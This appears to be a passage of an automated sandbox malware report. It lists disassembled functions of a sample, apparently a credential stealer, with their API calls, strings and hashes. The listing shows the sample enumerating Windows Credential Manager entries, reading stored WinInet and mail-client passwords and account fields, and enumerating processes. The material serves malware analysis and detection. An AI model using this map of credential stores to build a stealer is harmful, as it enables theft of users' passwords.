                    • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                    Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00444612
                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                    • strlen.MSVCRT ref: 0044462E
                    • memset.MSVCRT ref: 00444668
                    • memset.MSVCRT ref: 0044467C
                    • memset.MSVCRT ref: 00444690
                    • memset.MSVCRT ref: 004446B6
                      • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                      • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                    • memcpy.MSVCRT ref: 004446ED
                      • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                      • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                    • memcpy.MSVCRT ref: 00444729
                    • memcpy.MSVCRT ref: 0044473B
                    • _mbscpy.MSVCRT ref: 00444812
                    • memcpy.MSVCRT ref: 00444843
                    • memcpy.MSVCRT ref: 00444855
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset$strlen$_mbscpy
                    • String ID: salu
                    • API String ID: 3691931180-4177317985
                    • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                    • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                    • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                    • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                    Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                    • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$Library$FreeLoad
                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                    • API String ID: 2449869053-232097475
                    • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                    • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                    • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                    • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                    Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                    Download Yara Rule
                    APIs
                    • sprintf.MSVCRT ref: 0040957B
                    • LoadMenuA.USER32(?,?), ref: 00409589
                      • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                      • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                      • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                      • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                    • DestroyMenu.USER32(00000000), ref: 004095A7
                    • sprintf.MSVCRT ref: 004095EB
                    • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                    • memset.MSVCRT ref: 0040961C
                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                    • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                    • DestroyWindow.USER32(00000000), ref: 0040965C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                    • String ID: caption$dialog_%d$menu_%d
                    • API String ID: 3259144588-3822380221
                    • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                    • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                    • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                    • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                    Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                    • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                    • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                    • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$Library$FreeLoad
                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                    • API String ID: 2449869053-4258758744
                    • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                    • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                    • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                    • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                    Function 0040F802 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 118registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                    • memset.MSVCRT ref: 0040F84A
                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                    • LocalFree.KERNEL32(?), ref: 0040F92C
                    • RegCloseKey.ADVAPI32(?), ref: 0040F937
                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                    • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                    • String ID: Creds$ps:password
                    • API String ID: 551151806-1872227768
                    • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                    • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                    • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                    • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                    Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                    Download Yara Rule
                    APIs
                    • wcsstr.MSVCRT ref: 0040426A
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                    • _mbscpy.MSVCRT ref: 004042D5
                    • _mbscpy.MSVCRT ref: 004042E8
                    • strchr.MSVCRT ref: 004042F6
                    • strlen.MSVCRT ref: 0040430A
                    • sprintf.MSVCRT ref: 0040432B
                    • strchr.MSVCRT ref: 0040433C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                    • String ID: %s@gmail.com$www.google.com
                    • API String ID: 3866421160-4070641962
                    • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                    • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                    • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                    • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                    Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                    Download Yara Rule
                    APIs
                    • _mbscpy.MSVCRT ref: 00409749
                    • _mbscpy.MSVCRT ref: 00409759
                      • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                      • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                      • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                    • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                    • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                    • _mbscpy.MSVCRT ref: 004097A1
                    • memset.MSVCRT ref: 004097BD
                    • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                    • String ID: TranslatorName$TranslatorURL$general$strings
                    • API String ID: 1035899707-3647959541
                    • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                    • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                    • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                    • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                    Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                    • API String ID: 2360744853-2229823034
                    • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                    • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                    • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                    • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                    Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                    Download Yara Rule
                    APIs
                    • strchr.MSVCRT ref: 004100E4
                    • _mbscpy.MSVCRT ref: 004100F2
                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                    • _mbscpy.MSVCRT ref: 00410142
                    • _mbscat.MSVCRT ref: 0041014D
                    • memset.MSVCRT ref: 00410129
                      • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                      • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                    • memset.MSVCRT ref: 00410171
                    • memcpy.MSVCRT ref: 0041018C
                    • _mbscat.MSVCRT ref: 00410197
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                    • String ID: \systemroot
                    • API String ID: 912701516-1821301763
                    • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                    • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                    • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                    • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                    Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$strlen
                    • String ID: -journal$-wal$immutable$nolock
                    • API String ID: 2619041689-3408036318
                    • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                    • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                    • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                    • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                    Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                    • wcslen.MSVCRT ref: 0040874A
                    • _wcsncoll.MSVCRT ref: 00408794
                    • memset.MSVCRT ref: 0040882A
                    • memcpy.MSVCRT ref: 00408849
                    • wcschr.MSVCRT ref: 0040889F
                    • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                    • String ID: J$Microsoft_WinInet
                    • API String ID: 2203907242-260894208
                    • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                    • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                    • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                    • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                    Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                    • _mbscpy.MSVCRT ref: 00409686
                    • _mbscpy.MSVCRT ref: 00409696
                    • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                      • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfile_mbscpy$AttributesFileString
                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                    • API String ID: 888011440-2039793938
                    • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                    • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                    • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                    • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                    Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                    • strchr.MSVCRT ref: 0040327B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileStringstrchr
                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                    • API String ID: 1348940319-1729847305
                    • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                    • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                    • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                    • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                    Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                    • API String ID: 3510742995-3273207271
                    • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                    • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                    • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                    • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                    Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                      • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                    • strchr.MSVCRT ref: 0040371F
                    • _mbscpy.MSVCRT ref: 00403748
                    • _mbscpy.MSVCRT ref: 00403758
                    • strlen.MSVCRT ref: 00403778
                    • sprintf.MSVCRT ref: 0040379C
                    • _mbscpy.MSVCRT ref: 004037B2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                    • String ID: %s@gmail.com
                    • API String ID: 500647785-4097000612
                    • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                    • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                    • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                    • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                    Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004094C8
                    • GetDlgCtrlID.USER32(?), ref: 004094D3
                    • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                    • memset.MSVCRT ref: 0040950C
                    • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                    • _strcmpi.MSVCRT ref: 00409531
                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                    • String ID: sysdatetimepick32
                    • API String ID: 3411445237-4169760276
                    • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                    • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                    • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                    • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                    Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                    • GetSysColor.USER32(0000000F), ref: 0040B472
                    • DeleteObject.GDI32(?), ref: 0040B4A6
                    • DeleteObject.GDI32(00000000), ref: 0040B4A9
                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$DeleteImageLoadObject$Color
                    • String ID:
                    • API String ID: 3642520215-0
                    • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                    • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                    • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                    • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                    Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                    Download Yara Rule
                    APIs
                    • GetSystemMetrics.USER32(00000011), ref: 004072E7
                    • GetSystemMetrics.USER32(00000010), ref: 004072ED
                    • GetDC.USER32(00000000), ref: 004072FB
                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                    • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                    • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                    • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                    • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                    • String ID:
                    • API String ID: 1999381814-0
                    • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                    • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                    • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                    • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                    Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                    • API String ID: 1297977491-3883738016
                    • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                    • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                    • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                    • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                    Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                      • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                      • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                    • memcpy.MSVCRT ref: 0044972E
                    • memcpy.MSVCRT ref: 0044977B
                    • memcpy.MSVCRT ref: 004497F6
